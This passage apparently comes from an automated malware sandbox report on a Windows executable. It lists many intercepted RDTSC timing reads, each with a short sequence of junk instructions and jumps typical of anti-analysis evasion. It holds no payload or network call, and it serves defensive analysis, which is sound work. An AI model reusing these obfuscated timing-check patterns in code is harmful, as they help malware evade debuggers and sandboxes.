                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5458AC second address: 5458B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54CCD6 second address: 54CCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54CCDA second address: 54CCE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54AFFE second address: 54B004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54B004 second address: 54B00A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54B2CD second address: 54B2E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE6E8F184BDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54B2E0 second address: 54B2EA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE6E8B2908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54B8D4 second address: 54B8EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FE6E8F184B6h 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007FE6E8F184B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54BBD2 second address: 54BC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8B2908Dh 0x00000009 jmp 00007FE6E8B29099h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE6E8B29097h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54C4E2 second address: 54C4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5529C9 second address: 5529FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FE6E8B29086h 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f jmp 00007FE6E8B2908Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE6E8B29098h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5529FF second address: 552A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 552A03 second address: 552A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 551AA5 second address: 551AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8F184BBh 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55235D second address: 5523A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FE6E8B290ABh 0x0000000c jmp 00007FE6E8B29096h 0x00000011 jmp 00007FE6E8B2908Fh 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE6E8B29092h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 552511 second address: 552516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 552516 second address: 55251C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55251C second address: 552520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 556EDA second address: 556EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 56034F second address: 560355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 560355 second address: 560359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4A44C8 second address: 4A44D2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE6E8F184B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4A44D2 second address: 4A44E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jnl 00007FE6E8B29086h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55E6F7 second address: 55E6FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55E6FF second address: 55E703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55EFC0 second address: 55EFDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55F285 second address: 55F289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55F39F second address: 55F3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 55F3A3 second address: 55F3A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 56662A second address: 566630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 566630 second address: 566639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5741A4 second address: 5741B0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE6E8F184B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573D71 second address: 573D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573D77 second address: 573D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573D7C second address: 573D86 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8B2908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573EDC second address: 573EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573EE0 second address: 573EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573EEE second address: 573EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573EF2 second address: 573EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573EF6 second address: 573F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 573F02 second address: 573F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29090h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 576B69 second address: 576B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 576B71 second address: 576B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FE6E8B2908Eh 0x00000010 push ecx 0x00000011 jo 00007FE6E8B29086h 0x00000017 pop ecx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 576B91 second address: 576BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BDh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 576BA3 second address: 576BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 576735 second address: 576740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 576740 second address: 576748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 58E5A6 second address: 58E5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 58E5AC second address: 58E5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 58E5B0 second address: 58E5C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE6E8F184BBh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 58E5C5 second address: 58E5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5AA8C1 second address: 5AA8C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5AA8C8 second address: 5AA8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5A5A66 second address: 5A5A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5A5A6A second address: 5A5A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5B8589 second address: 5B858F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5B82B1 second address: 5B82B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5B82B7 second address: 5B82BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D11C3 second address: 5D11C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D0233 second address: 5D0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D0237 second address: 5D025B instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8B29086h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d jng 00007FE6E8B290A4h 0x00000013 pushad 0x00000014 jmp 00007FE6E8B2908Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D03D0 second address: 5D03D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D03D6 second address: 5D03DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D03DC second address: 5D03E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D06F5 second address: 5D06FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D09E3 second address: 5D09E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D0B1C second address: 5D0B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D0B20 second address: 5D0B2A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D3CA7 second address: 5D3CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D3CAB second address: 5D3CDB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE6E8F184C8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FE6E8F184B6h 0x00000017 jnc 00007FE6E8F184B6h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D7EDF second address: 5D7EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D7EEE second address: 5D7EF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D7EF3 second address: 5D7EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D9E5D second address: 5D9E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FE6E8F184C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5D9E6B second address: 5D9E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460182 second address: 5460188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5460188 second address: 5460197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B2908Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545003D second address: 545007E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dh, al 0x0000000f call 00007FE6E8F184C5h 0x00000014 mov eax, 58A75E07h 0x00000019 pop eax 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov di, ax 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE6E8F184BDh 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545007E second address: 54500A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B2908Dh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54500A4 second address: 54500C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54500C0 second address: 54500C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54500C4 second address: 54500D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54500D7 second address: 54500DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54500DD second address: 54500E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480EC3 second address: 5480ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5480ED2 second address: 5480F21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov ebx, 5968E56Ch 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FE6E8F184BBh 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE6E8F184C5h 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54200C3 second address: 54200CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54200CB second address: 54200D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a mov edx, eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54200D7 second address: 54200DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54200DB second address: 542012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov edx, esi 0x00000009 movzx ecx, di 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FE6E8F184C8h 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FE6E8F184BDh 0x0000001e add ch, FFFFFFA6h 0x00000021 jmp 00007FE6E8F184C1h 0x00000026 popfd 0x00000027 push eax 0x00000028 pop edx 0x00000029 popad 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 542012C second address: 542019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE6E8B29093h 0x00000014 add ah, FFFFFF8Eh 0x00000017 jmp 00007FE6E8B29099h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FE6E8B29090h 0x00000023 jmp 00007FE6E8B29095h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440D3E second address: 5440D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440D44 second address: 5440D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440D48 second address: 5440D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544088B second address: 544088F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544088F second address: 5440893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440893 second address: 5440899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
